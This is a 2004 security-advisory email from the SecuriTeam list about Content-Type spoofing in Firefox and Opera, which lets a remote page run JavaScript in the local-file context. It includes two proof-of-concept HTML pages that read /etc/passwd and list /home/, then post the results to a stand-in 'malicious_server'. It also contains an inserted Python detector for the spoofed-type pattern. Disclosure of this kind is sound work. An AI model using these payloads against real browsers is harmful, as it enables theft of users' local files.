Date: 16 Dec 2004 14:50:52 +0200
From: SecuriTeam <support@securiteam.com>
To: [email protected]
Subject: [NEWS] Content-Type Spoofing in Mozilla Firefox and Opera Allows Users to Bypass Security Restrictions
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Content-Type Spoofing in Mozilla Firefox and Opera Allows Users to Bypass
Security Restrictions
------------------------------------------------------------------------
SUMMARY
A problem exists in some browsers where Content-Type spoofing can be used
to "force" the target user to open a page as a local file, bypassing the
security zone and executing JavaScript in the local context.
DETAILS
Browsers tested:
* Firefox version 1.0
* Mozilla version 1.7.x
* Opera version 7.54 (*)
* Konqueror version 3.3.1
* Epiphany
* Internet Explorer version 6 with SP1
* Internet Explorer version 6 with SP1 + SP2
Browsers affected:
* Firefox version 1.0
* Mozilla version 1.7.x
* Opera version 7.51 up to version 7.54 (inclusive)
When the "victim" user visits http://malicious_server/page.html and
malicious_server responds with a page carrying an unknown Content-Type
value (for example text/html., note the trailing dot), the browser shows a
dialog window with some options (open, save, cancel). If the user chooses
"Open" to view this page, it is downloaded and opened as a local file, so
its JavaScript code is executed in the local context. Obviously, the result
is the same if the user chooses to save the file and opens it afterwards.
Giovanni tested this with several browsers, but it seems that only Mozilla
Firefox and Opera (*) are exploitable in this way.
(*) For Opera, this method of exploitation requires that Opera be set as
the Default Application in "handler for saved files", so that it is used
when the user chooses "Open" in the dialog window.
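As an added example (not part of the advisory or of any browser's code), a small Python check that a proxy or response-inspection tool could apply to flag the pattern described above: a body that looks like HTML served under a Content-Type that is syntactically valid but not one the browser renders inline, such as text/html with a trailing dot. The allowlist of inline-rendered types and the sample responses are constructed for this example.

```python
import re

# Media types a browser renders inline as HTML (constructed allowlist for this example).
HTML_TYPES = {"text/html", "application/xhtml+xml"}

# RFC 2045 token characters. Note that "." is a legal token character, so a value
# such as "text/html." is syntactically valid; it is merely a subtype nobody registered.
_TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
_MEDIA_RE = re.compile(r"^\s*(" + _TOKEN + r")/(" + _TOKEN + r")\s*(?:;.*)?$", re.S)
_HTML_BODY_RE = re.compile(rb"^\s*(?:<!doctype\s+html|<html|<script|<body|<iframe)", re.I)


def parse_media_type(value):
    """Return (type, subtype) in lower case, or None if the header is not a media type."""
    m = _MEDIA_RE.match(value or "")
    if not m:
        return None
    return m.group(1).lower(), m.group(2).lower()


def classify_response(content_type, body):
    """Classify one response as 'render', 'spoofed-html' or 'other'.

    'spoofed-html' is the advisory's pattern: an HTML body behind a Content-Type the
    browser does not render inline, so it offers an open/save dialog instead.
    """
    parsed = parse_media_type(content_type)
    media = "/".join(parsed) if parsed else ""
    if media in HTML_TYPES:
        return "render"
    if _HTML_BODY_RE.match(body[:512]):
        return "spoofed-html"
    return "other"


def scan(responses):
    """Apply classify_response to (content_type, body) pairs and return the verdicts."""
    return [classify_response(ct, body) for ct, body in responses]


# Constructed sample responses (not captured traffic).
SAMPLE_RESPONSES = [
    ("text/html; charset=utf-8", b"<html><body>hello</body></html>"),
    ("text/html.", b"<html><body onload='go()'></body></html>"),
    ("application/octet-stream", b"\n<!DOCTYPE html><html></html>"),
    ("image/png", b"\x89PNG\r\n\x1a\n"),
]

if __name__ == "__main__":
    for (ct, _), verdict in zip(SAMPLE_RESPONSES, scan(SAMPLE_RESPONSES)):
        print(f"{ct!r:32} -> {verdict}")
```

A 'spoofed-html' verdict is the case in which Firefox 1.0 and Opera 7.5x would show the open/save dialog for HTML content; a 'render' verdict is handled by the normal HTTP security zone.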
Impact:
It could allow remote users to:
* Obtain the content of the /home/ directory (or c:\Documents and Settings\
on Windows systems) and therefore gather a set of usernames present on
the target system
* Learn whether a particular program is installed on the target system, for
use in a subsequent attack
* Read the content of confidential files
* Read the browser's cache
In Opera it is located in ~/.opera/cache4, while in Mozilla Firefox it is
in /.mozilla/firefox/$RANDOM-STRING.default/Cache. Since it is possible to
enumerate the directory structure, a malicious user could easily learn the
path to Firefox's cache.
Proof of concept:
The following PoCs exploit the Linux versions of Firefox and Opera, but
they can also be applied to the Windows versions. In order to test
Content-Type spoofing, Giovanni modified an open source web server to
make it respond with a spoofed Content-Type.
Read a local file using the innerHTML property:
<html>
<body onLoad="ReadFileContent()">
<iframe name="local_file" src="file:///etc/passwd" height=0 width=0></iframe>
<form name="module" method="post" action="http://malicious_server/grab.php" ENCTYPE="text/plain">
<input name="content" type="hidden" size="300">
</form>
<script>
function ReadFileContent(){
  alert(local_file.document.all(0).innerHTML);
  document.module.content.value+=local_file.document.firstChild.innerHTML;
  //send content to malicious_server
  document.module.submit();
}
</script>
</body>
</html>
(*) This works with Firefox; with Opera it works only if the file has a
.htm or .html extension.
List the directory structure:
<html>
<body onLoad="
  for(i=0;i<local_files.document.links.length;i++)
  {document.module.content.value+=local_files.document.links.item(i);}
  alert(document.module.content.value);
  //send list_files at malicious_server
  document.module.submit();
">
<form name="module" method="post" action="http://malicious_server/grab.php" ENCTYPE="text/plain">
<input name="content" type="hidden" size="300">
</form>
<iframe name="local_files" src="file:///home/" height=0 width=0></iframe>
</body>
</html>
Vendor status:
24th November 2004: Giovanni contacted Mozilla by [email protected]
and Opera through its bug tracking page at https://bugs.opera.com/wizard/.
Response from Mozilla (https://bugzilla.mozilla.org/show_bug.cgi?id=273419):
"The problem is that Mozilla utilizes the mime-type for served HTTP
documents but it does use the extension for opening local files. To
workaround this, you should disable the "open with" option. This would
move the "who is to blame" around to the user because he has to go through
the OS Filemanager to open it."
ADDITIONAL INFORMATION
The information has been provided by Giovanni Delvecchio
<mailto:badpenguin@zone-h.org>.
The original article can be found at:
http://www.zone-h.org/en/advisories/read/id=6502/
This bulletin is sent to members of the SecuriTeam mailing list.